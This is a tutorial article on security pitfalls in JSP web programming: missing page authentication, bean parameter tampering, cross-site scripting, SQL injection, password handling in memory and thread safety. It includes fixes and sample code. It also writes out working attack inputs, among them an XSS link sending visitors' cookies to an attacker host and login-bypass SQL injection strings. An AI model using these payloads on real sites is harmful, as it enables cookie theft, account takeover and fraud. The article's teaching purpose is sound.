Creation time: 2004-04-12
Article attribute: original
Article submission:
Stone_Star (Turbid_LIMPID_AT_HOTMAIL.COM)
JavaServer Pages (JSP), a technology for building dynamic web pages, keeps gaining ground. JSP works differently from ASP and PHP: generally speaking, a JSP page is compiled rather than interpreted. The first request for a JSP file is really a compilation of that file into a servlet. On each later request for the page, the server checks whether the JSP file has changed since it was last compiled; if not, the existing servlet is executed directly with no recompilation, which is a significant gain in efficiency.
This article looks at security from the point of view of the script programmer; other sources of trouble, such as exposure of the source code, are outside its scope. Its main purpose is to remind friends who are just starting with JSP programming that a sense of secure programming must be cultivated from the very beginning, so that mistakes that should never be made are not made and avoidable losses are not suffered. It is also meant to start a discussion: if there are errors or other opinions, please post them.
1. Lax authentication: a low-level mistake
In Western Forum V1.12, user_manager.jsp is the user-management page. The author knew how sensitive it is and put a lock on it:

    if ((session.getValue("UserName") == null) ||      // first attribute name is garbled in the source; "UserName" is assumed
        (session.getValue("UserClass") == null) ||
        (!session.getValue("UserClass").equals("System Administrator")))
    {
        response.sendRedirect("err.jsp?id=14");
        return;
    }
To view or modify a user's information, however, you have to go through modifyuser_manager.jsp. The administrator submits

    http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51

to view and modify the information of the user with ID 51 (51 is the administrator's default user ID). Yet this important file has no authentication at all: an ordinary user (a guest included) can submit the very same request and see the whole record, password included, because passwords are stored and displayed in plaintext. modifyuser_manage.jsp, which performs the data update, is just as wide open; a malicious user can run the update and only sees the error page after the data has already been changed. Clearly, locking one door is not enough. When programming, do not be lazy about it: add an identity check to every page that needs one.
2. Guard the entrance to the JavaBean
The core of JSP component technology is the Java component called a bean. Logic control and database operations are placed in JavaBean components, which the JSP file then calls; this makes the program clearer and more reusable. A JSP page is far more concise than a traditional ASP or PHP page, because so much of the dynamic processing can be encapsulated in JavaBeans.
JavaBean properties are set from a JSP page with the <jsp:setProperty> tag.
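To make clear what the property="*" form of this tag does under the hood, and why the shopping-basket code that follows is exploitable, here is an added example (not code from the article or from the shopping system) that reproduces the tag's behaviour in plain Java: every request parameter whose name matches a writable bean property is converted and passed to that property's setter. The bean classes, the item id and the price are constructed for the example.

```java
import java.beans.BeanInfo;
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class SetPropertyStarDemo {

    /** Bean in the style of the shopping system: balance has a public setter, so the client can set it. */
    public static class LeakyBasket {
        private String newItem;
        private double balance;
        public String getNewItem() { return newItem; }
        public void setNewItem(String newItem) { this.newItem = newItem; }
        public double getBalance() { return balance; }
        public void setBalance(double balance) { this.balance = balance; }
    }

    /** Hardened bean: the total is derived from a server-side price list and has no setter at all. */
    public static class SafeBasket {
        private static final Map<String, Double> PRICES = new HashMap<String, Double>();
        static { PRICES.put("Item0105342", 49.95); }              // constructed catalogue entry
        private final List<String> items = new ArrayList<String>();
        public void setNewItem(String id) {                        // unknown ids are ignored
            if (PRICES.containsKey(id)) items.add(id);
        }
        public String getNewItem() { return items.isEmpty() ? null : items.get(items.size() - 1); }
        public double getBalance() {
            double total = 0;
            for (String id : items) total += PRICES.get(id);
            return total;
        }
    }

    /**
     * What <jsp:setProperty property="*"/> does: for every request parameter whose name matches
     * a writable bean property, convert the string and call the setter. Returns the setters called.
     */
    static List<String> setAllProperties(Object bean, Map<String, String> params) throws Exception {
        List<String> called = new ArrayList<String>();
        BeanInfo info = Introspector.getBeanInfo(bean.getClass(), Object.class);
        for (PropertyDescriptor pd : info.getPropertyDescriptors()) {
            Method setter = pd.getWriteMethod();
            String raw = params.get(pd.getName());
            if (setter == null || raw == null) continue;           // no setter: the parameter is ignored
            Class<?> type = pd.getPropertyType();
            Object value = (type == double.class) ? (Object) Double.valueOf(raw) : raw;
            setter.invoke(bean, value);
            called.add(setter.getName() + "(" + raw + ")");
        }
        return called;
    }

    public static void main(String[] args) throws Exception {
        // Constructed request: the legitimate item plus the forged balance=0 from the query string.
        Map<String, String> request = new LinkedHashMap<String, String>();
        request.put("newItem", "Item0105342");
        request.put("balance", "0");

        LeakyBasket leaky = new LeakyBasket();
        leaky.setBalance(49.95);                                    // total from earlier requests in the session
        System.out.println("LeakyBasket setters called: " + setAllProperties(leaky, request));
        System.out.println("  total charged: $" + leaky.getBalance());   // 0.0: checkout is free

        SafeBasket safe = new SafeBasket();
        System.out.println("SafeBasket setters called:  " + setAllProperties(safe, request));
        System.out.println("  total charged: $" + safe.getBalance());    // 49.95: balance has no setter
    }
}
```

Two fixes follow from this: either name the properties explicitly in the page (property="newItem" instead of property="*"), or design the bean so that anything the client must not control has no setter and is computed on the server, as SafeBasket does. Doing both is cheapest.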
The following code is part of the source of an electronic shopping system. It displays the contents of the user's basket; checkout.jsp does the checkout. (The tags were lost when the page was extracted; the bean name and class below are reconstructed and assumed.)

    <jsp:useBean id="basket" class="shop.Basket" scope="session" />
    <jsp:setProperty name="basket" property="*" />
    <html><body>
    <h2>Your Basket</h2>
    You have added the item <jsp:getProperty name="basket" property="newItem" /> to your basket.
    Your total is $<jsp:getProperty name="basket" property="balance" />
    <a href="checkout.jsp">Proceed to checkout</a>
    </body></html>

Note the property="*". It means that the value of every variable the user enters on the visible JSP page, or submits directly through the query string, is stored in the bean property with the matching name. Normally the user submits

    http://www.somesite.com/addtobasket.jsp?newItem=Item0105342

But what about a user who does not play by the rules? He may submit

    http://www.somesite.com/addtobasket.jsp?newItem=Item0105342&balance=0

and that balance is stored in the JavaBean. When he clicks "Checkout", the goods are free. This is the same class of problem as the one global variables cause in PHP. The lesson: property="*" must be used with care!

3. The evergreen cross-site script

A cross-site scripting attack inserts malicious JavaScript, VBScript, ActiveX, HTML, Flash or other script into the HTML of a remote web page in order to steal the privacy of the users browsing that page, change their settings, or damage their data. In most cases it does not affect the operation of the server or the web application, but it is a serious threat to the security of the client.

The simplest example comes from the A Cherry forum (beta-1). Submit

    http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>alert(document.cookie)</script>

and a dialog box shows your own cookie. Submit

    http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://www.163.com'</script>

and you are redirected to NetEase. Because the script neither encodes nor filters the "name" variable before echoing it back, the script code runs in the user's browser whenever the user opens a link carrying malicious "name" data, with consequences such as loss of the user's privacy.
For example, with the link

    http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script>

xxx.xxx on the attacker's side collects the parameter, which here is document.cookie, the cookie of whoever opens the link. In the ASP world many people have practised cookie stealing; reading cookies in JSP is no harder. Of course, cross-site scripting is by no means limited to stealing cookies; readers will have some understanding of this already, so it is not expanded on here.

Every input and output of a dynamic page should be encoded; that avoids the great majority of cross-site scripting attacks. Unfortunately, encoding every piece of data is a resource-intensive job that affects the performance of the web server.
A common alternative is filtering, as in the following code that replaces the dangerous characters:

    <%
    String message = request.getParameter("message");
    if (message == null) message = "";          // getParameter returns null when the parameter is absent
    message = message.replace('<', '_');
    message = message.replace('>', '_');
    message = message.replace('"', '_');
    message = message.replace('\'', '_');
    message = message.replace('%', '_');
    message = message.replace(';', '_');
    message = message.replace('(', '_');
    message = message.replace(')', '_');
    message = message.replace('&', '_');
    message = message.replace('+', '_');        // last character is garbled in the source; '+' is assumed
    %>

A more proactive approach is a regular expression that allows only the specified characters:

    public boolean isValidInput(String str) {
        if (str.matches("[a-z0-9]+"))            // the whole string must be lowercase letters or digits
            return true;
        else
            return false;
    }

4. Keep SQL injection in mind

Programming books pay no attention to training in secure programming when they teach beginners. The famous "JSP Programming Thought and Practice" demonstrates a database-backed login system to beginners (database: MySQL) with this code:

    Statement stmt = conn.createStatement();
    String checkUser = "select * from login where username='" + userName
                     + "' and userpassword='" + userPassword + "'";
    ResultSet rs = stmt.executeQuery(checkUser);
    if (rs.next())
        response.sendRedirect("sucsslogin.jsp");
    else
        response.sendRedirect("failurelogin.jsp");

So readers of the book will go on using this "holed" login code for a long time.
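The proper repair is not to filter characters but to keep the values out of the SQL text altogether. As an added example (not the book's code), the same check written with a JDBC PreparedStatement, beside a helper that shows the exact string the book's concatenation hands to the database for the malformed inputs discussed next. The table and column names are the book's; the method names and the sample inputs are constructed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public final class LoginCheck {

    private LoginCheck() { }

    /** What the book's code actually sends to the database (shown for comparison only). */
    static String buildVulnerableQuery(String userName, String userPassword) {
        return "select * from login where username='" + userName
             + "' and userpassword='" + userPassword + "'";
    }

    /**
     * Hardened check: the values travel as bound parameters, never as SQL text, so a quote
     * or a comment marker in them is just data. The statement is prepared once per call here;
     * a real application would cache it. Storing passwords in plaintext, as the login table
     * in the text does, is a separate problem this example does not fix.
     */
    static boolean checkUser(Connection conn, String userName, String userPassword) throws SQLException {
        String sql = "select 1 from login where username = ? and userpassword = ?";
        PreparedStatement ps = conn.prepareStatement(sql);
        try {
            ps.setString(1, userName);
            ps.setString(2, userPassword);
            ResultSet rs = ps.executeQuery();
            try {
                return rs.next();                    // one matching row means the credentials are valid
            } finally {
                rs.close();
            }
        } finally {
            ps.close();
        }
    }

    public static void main(String[] args) {
        // Constructed login attempts: the three bypasses for user "jack" given in the text.
        String[][] attempts = {
            { "jack",              "' or 'a'='a" },
            { "jack",              "' or 1=1 /*" },
            { "jack' or 1=1 /*",   "anything"    },
        };
        for (String[] a : attempts) {
            System.out.println(buildVulnerableQuery(a[0], a[1]));
        }
        // With checkUser(conn, "jack", "' or 1=1 /*") the driver sends the literal password
        // text as a parameter; no row has that password, so the call returns false.
    }
}
```

Running main prints the three statements; in each the WHERE clause has become "username='jack' and userpassword='' or 'a'='a'" or a variant ending in a comment, which is true for every row, so rs.next() succeeds without a password.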
If there is a user named "jack" in the database, then at least the following let you log in without knowing the password:

    user name: jack              password: ' or 'a'='a
    user name: jack              password: ' or 1=1 /*
    user name: jack' or 1=1 /*   password: (anything)

LYBBS (Ling Yun Forum) ver 2.9 checks the submitted login data like this in Loginout.java:

    if (s.equals("") || s1.equals(""))
        throw new UserException("User name or password cannot be empty.");
    if (s.indexOf("'") != -1 || s.indexOf("\"") != -1 || s.indexOf(",") != -1 || s.indexOf("\\") != -1)
        throw new UserException("The user name cannot contain ' \" , \\ or other illegal characters.");
    if (s1.indexOf("'") != -1 || s1.indexOf("\"") != -1 || s1.indexOf("*") != -1 || s1.indexOf("\\") != -1)
        throw new UserException("The password cannot contain ' \" \\ * or other illegal characters.");
    if (s.startsWith(" ") || s1.startsWith(" "))
        throw new UserException("The user name or password cannot begin with a space.");

But for some reason he filters the asterisk only in the password and not in the user name. The forward slash should also be on the blacklist. I still think the simplest way is a regular expression that allows only characters in a specified range.

One reminder here: do not assume that some database system or platform setting will effectively resist every attack. pinkeyes's "PHP Injection Instance" gave a counterexample for magic_quotes_gpc = On in the PHP configuration file.

5. The hidden danger of String objects

The Java platform does make secure programming easier. Java has no pointers, so a Java program cannot, like a C program, address arbitrary memory in its address space. When a JSP file is compiled into a .class file, accesses are checked: an attempt to read an array element beyond the array's size is rejected, which largely rules out buffer overflow attacks.
String objects, however, bring a security hazard of their own. If a password is stored in a Java String, it stays in memory until garbage collection or process termination, and even after garbage collection it remains in the free heap until that memory is reused. The longer the password String stays in memory, the greater the risk of it being read. Worse, under memory pressure the operating system may swap the page holding the password String out to disk, where it is exposed to disk-block eavesdropping.
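The mitigation is to keep the password in a char array and zero it as soon as it has been used; the point is easy to undo by accident, because any conversion through String (for hashing, for a JDBC setString, for logging) creates an immutable copy that cannot be cleared. Here is an added example (not from the article) that hashes and verifies a password without ever building a String from it and wipes every intermediate buffer. The hash algorithm and the sample password are constructed for the example; a real login store would use a slow, salted password hash rather than a bare SHA-256.

```java
import java.nio.ByteBuffer;
import java.nio.CharBuffer;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;

public final class PasswordBuffer {

    private PasswordBuffer() { }

    /** Hash a password held in a char[] without turning it into a String at any point. */
    static byte[] digest(char[] password) throws NoSuchAlgorithmException {
        // CharBuffer.wrap does not copy; encode() produces a fresh byte[] that we must wipe too.
        ByteBuffer bytes = StandardCharsets.UTF_8.encode(CharBuffer.wrap(password));
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            md.update(bytes);                              // consumes the bytes directly
            return md.digest();
        } finally {
            if (bytes.hasArray()) {
                Arrays.fill(bytes.array(), (byte) 0);      // zero the encoded copy
            }
        }
    }

    /** Compare a supplied password with a stored digest; the supplied buffer is wiped whatever happens. */
    static boolean verify(char[] supplied, byte[] storedDigest) throws NoSuchAlgorithmException {
        try {
            return MessageDigest.isEqual(digest(supplied), storedDigest);   // constant-time comparison
        } finally {
            Arrays.fill(supplied, '\0');                   // the caller's copy is gone the moment it is used
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs. In real code the char[] comes from System.console().readPassword();
        // the String literal used here is exactly the kind of copy the technique is meant to avoid.
        char[] enrolled = "hunter2".toCharArray();
        byte[] stored = digest(enrolled);                  // what the user table would hold
        Arrays.fill(enrolled, '\0');

        char[] attempt = "hunter2".toCharArray();
        System.out.println("verified: " + verify(attempt, stored));                       // true
        System.out.println("attempt buffer after use: " + Arrays.toString(attempt));    // all '\0'

        char[] wrong = "hunter3".toCharArray();
        System.out.println("wrong password: " + verify(wrong, stored));                  // false
    }
}
```

The finally blocks are what matter: the wipe must happen on the exception path as well, and every derived buffer (here the UTF-8 encoding) needs its own wipe, or the secret simply moves to a different array.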
To minimize this leak (it cannot be eliminated), store the password in a char array and zero it after use (a String is immutable, so it cannot be zeroed).

6. Keep thread safety in mind

"What Java can do, JSP can do." Unlike ASP, PHP and the like, JSP executes in a multi-threaded fashion by default. Multi-threaded execution greatly reduces the resources the system needs and improves its concurrency and response time. A thread is an independent, concurrent execution path within a program; each thread has its own stack, its own program counter and its own local variables. Most operations in a multi-threaded application run in parallel, but some (updating a global flag, or working on a shared file) cannot. Without thread synchronization, under heavy load the problems appear on their own, with no "enthusiastic participation" from malicious users required. The simplest fix is to add the directive

    <%@ page isThreadSafe="false" %>

to the JSP files concerned, so that they run single-threaded and all clients are served serially. This seriously degrades system performance, and note that the container may still keep a pool of several instances of such a page, so the directive only serializes access to one instance's own fields, not to static fields or application-scope objects. Alternatively the JSP file can stay multi-threaded and synchronize the threads by locking methods: a method is locked with the synchronized keyword. Look at the following example:

    public class MyClass {
        int a;
        public void init() {                 // this method may be called by several threads at the same time
            a = 0;
        }
        public synchronized void set() {     // two threads cannot be inside this method at the same time
            if (a > 5) {
                a = a - 5;
            }
        }
    }

Note that init() writes a without holding the lock, so it still races with set(): every access to shared state has to go through the same lock. But locking has some impact on system performance too. A better solution is to use local variables instead of instance variables.
Instance variables are allocated on the heap and shared by every thread using that instance, so they are not thread-safe; local variables are allocated on the stack, and since each thread has its own stack, they are thread-safe.
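The lost-update race the text describes is easy to reproduce, which makes it a good test for whether a page's state really is thread-safe. This is an added example (not code from the article) that runs the same increment from several threads three ways: on an unsynchronized instance field, on the same field behind synchronized, and on a local variable; the thread and iteration counts are arbitrary.

```java
import java.util.ArrayList;
import java.util.List;

public class SharedCounterDemo {

    /** Instance field updated by every request thread with no lock: updates get lost. */
    static class UnsafeCounter {
        int a;
        void add() { a = a + 1; }                  // read, add, write: three steps, not atomic
    }

    /** The same field guarded by the intrinsic lock, as with synchronized in the text. */
    static class LockedCounter {
        int a;
        synchronized void add() { a = a + 1; }
    }

    /** Per-thread counter kept in a local variable: it lives on that thread's stack, so no lock is needed. */
    static class LocalWorker implements Runnable {
        final int iterations;
        int result;                                // written once, after the loop; read after join()
        LocalWorker(int iterations) { this.iterations = iterations; }
        public void run() {
            int local = 0;                         // no other thread can see this variable
            for (int i = 0; i < iterations; i++) local = local + 1;
            result = local;
        }
    }

    /** Start every task on its own thread and wait; join() makes each thread's writes visible to the caller. */
    static void runOnThreads(List<? extends Runnable> tasks) throws InterruptedException {
        List<Thread> threads = new ArrayList<Thread>();
        for (Runnable r : tasks) { Thread t = new Thread(r); threads.add(t); t.start(); }
        for (Thread t : threads) t.join();
    }

    public static void main(String[] args) throws InterruptedException {
        final int THREADS = 8, PER_THREAD = 200_000;   // constructed load
        final int EXPECTED = THREADS * PER_THREAD;

        final UnsafeCounter unsafe = new UnsafeCounter();
        List<Runnable> tasks = new ArrayList<Runnable>();
        for (int i = 0; i < THREADS; i++) tasks.add(() -> { for (int j = 0; j < PER_THREAD; j++) unsafe.add(); });
        runOnThreads(tasks);
        System.out.println("unsynchronized instance field: " + unsafe.a + " (expected " + EXPECTED + ")");

        final LockedCounter locked = new LockedCounter();
        tasks.clear();
        for (int i = 0; i < THREADS; i++) tasks.add(() -> { for (int j = 0; j < PER_THREAD; j++) locked.add(); });
        runOnThreads(tasks);
        System.out.println("synchronized instance field:   " + locked.a);

        List<LocalWorker> workers = new ArrayList<LocalWorker>();
        for (int i = 0; i < THREADS; i++) workers.add(new LocalWorker(PER_THREAD));
        runOnThreads(workers);
        int sum = 0;
        for (LocalWorker w : workers) sum += w.result;  // every w.result is exactly PER_THREAD
        System.out.println("local variables, summed:        " + sum);
    }
}
```

Run it a few times: the first line is usually well short of the expected total and varies from run to run, while the other two are always exact. The same defect in a JSP shows up as a counter, a cached query result or a "current user" field that belongs to somebody else's request.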